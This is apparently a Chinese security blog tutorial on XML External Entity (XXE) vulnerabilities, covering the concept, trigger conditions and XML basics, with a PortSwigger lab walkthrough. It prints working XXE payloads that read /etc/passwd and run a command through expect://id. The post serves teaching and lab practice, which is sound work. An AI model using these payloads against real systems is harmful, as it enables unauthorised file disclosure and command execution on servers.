同学,XXE漏洞了解一下

同学,XXE漏洞了解一下

原创 Caigensec 菜根网络安全杂谈 2025-02-06 04:09

点击标题下「蓝色微信名」可快速关注

免责声明:本文仅用于合法范围的学习交流,若使用者将本文用于非法目的或违反相关法律法规的行为,一切责任由使用者自行承担。请遵守相关法律法规,勿做违法行为!本公众号尊重知识产权,如有侵权请联系我们删除。

01

漏洞介绍

1、XXE概念

XXE(XML External Entity,XML外部实体)漏洞,是一种因XML解析器不当处理外部实体而引发的安全漏洞。攻击者通过构造恶意XML数据,利用外部实体功能读取服务器本地文件、探测内网服务或发起拒绝服务攻击甚至实现远程代码执行等。

2、漏洞利用原理

(1)外部实体引用

XML允许定义外部实体
,这些实体可以从外部资源(如本地文件、远程URL)加载数据。攻击者通过在XML中插入恶意外部实体,利用解析器的功能读取敏感信息。

(2)漏洞触发条件

  • XML解析器默认启用外部实体解析(如旧版PHP的libxml库、Java的SAXParser等)。
  • 用户可控的XML输入未被过滤(如上传XML文件、提交XML格式的API请求)。
  • 解析结果被直接返回或错误信息泄露敏感数据。

3、常见的漏洞利用场景

文件上传功能

用户上传XML格式的文件(如SVG图片、配置文件),解析时触发XXE。

API接口

REST/SOAP API接收XML格式的请求体,未校验外部实体。

单点登录(SSO)

SAML协议使用XML进行身份断言,若解析不当可能被利用。

XXE漏洞的本质是XML解析器过度信任用户输入。防御需从禁用外部实体、严格过滤输入、更新依赖库三方面入手。开发人员应始终对XML数据保持警惕,尤其是在处理用户可控内容时。

02

XML简单了解

XML学习参考链接:
https://www.w3school.com.cn/xml/index.asp

1、XML简介

XML 指可扩展标记语言(EXtensible Markup Language)

XML 是一种
标记语言
,很类似 HTML

XML 的设计宗旨是
传输数据
,而非显示数据

XML 标签没有被预定义。需要
自行定义标签

XML 被设计为具有
自我描述性

XML 是 
W3C 的推荐标准

XML 被设计为传输和存储数据,其焦点是数据的内容。

HTML 被设计用来显示数据,其焦点是数据的外观。

2、XML结构

<?xml version="1.0" encoding="ISO-8859-1"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>Don't forget the meeting!</body></note>

第一行是 XML 声明。它定义 XML 的版本 (1.0) 和所使用的编码 

下一行描述文档的根元素

接下来 4 行描述根的 4 个子元素(to, from, heading 以及 body)

最后一行定义根元素的结尾

3、XML外部实体

外部实体是一种特殊的实体,它指向外部资源(如文件、URL 等),允许在 XML 文档中引用外部的文本数据。外部实体的主要作用是实现数据的复用和模块化,使得 XML 文档可以引用外部的文件内容,避免在多个 XML 文档中重复相同的数据。

(1)读取系统文件

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE readFile [    <!ENTITY ff SYSTEM "file:///etc/passwd">]>    <message>&ff;</message>

(2)执行系统命令

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa [    <!ENTITY ff SYSTEM "expect://id">]>    <message>&ff;</message>

02

XML简单了解

靶场地址:
https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

Lab: Exploiting XXE using external entities to retrieve files

利用XXE外部实体读取文件

(1)在商品页面Check stock,抓包

(2)发现数据包里有XML文件

(3)修改XML文件内容,访问/etc/passwd目录

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE readFile [
    <!ENTITY ff SYSTEM "file:///etc/passwd">
]>
 <stockCheck><productId>&ff;</productId><storeId>3</storeId></stockCheck>

(4)访问文件成功,实验解决

THE END

亲爱的朋友,若你觉得文章不错,请点击关注。你的关注是笔者创作的最大动力,感谢有你